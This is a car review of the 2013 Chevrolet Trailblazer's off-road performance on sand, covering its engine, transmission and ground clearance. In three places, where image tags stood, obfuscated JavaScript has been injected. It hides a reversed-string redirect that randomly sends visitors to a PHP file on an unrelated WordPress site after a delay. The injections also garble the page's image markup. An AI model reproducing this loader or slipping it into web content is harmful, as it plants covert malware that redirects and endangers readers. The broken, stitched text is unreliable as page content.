2013 Chevrolet Trailblazer. ‘Ruthless’ Terrain

Our convoy is a lot smaller now. Knowing that certain members of the media have a tendency to disappear into the distance and not come back for a day or two, our instructors give each of us fifteen minutes for a thrash on the sand. Once again we’re dealing with high-range 4WD terrain, but a couple of ambitious “are we sure we should be trying this?” moments show that the system is much more capable than I’d first given it credit for.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/10/chevrolet-trailblazer-rak-012.jpg” width=”728″ height=”524″ />

We may not be dealing with ruthless terrain (and one wonders exactly how the Trailblazer would fare on the more unforgiving kitty litter), but power pickup from the 236hp 3.6-litre V6 is solid, the gearing of the six-speed automatic transmission configured in a way that means we hardly have to change out of first or second. The 329lb-ft of torque also ensures we keep up momentum on some of the trickier sections. It all feels very easy and controllable.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/10/chevrolet-trailblazer-rak-015.jpg” width=”728″ height=”524″ />

Where the Chevy really brings its A-game though is with class leading ground clearance (232mm), and on a number of occasions (particularly moments when our exuberance has seen the front tyres bite a little too hard and drag us into some deep sand) our Trailblazer avoids being beached when it really had no right to. A few times on our wanderings we hit some deep sand, but a few well timed/frantic turns at the wheel soon claws us out of any potential pickle.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/10/chevrolet-trailblazer-rak-014.jpg” width=”728″ height=”525″ />

There’s split opinion then as we sit down to lunch a little later and talk shop with our GM-suited hosts. Overall the reaction is positive, but there’s an overriding sense of, ‘well that was good for a taster, but what else does it do?’
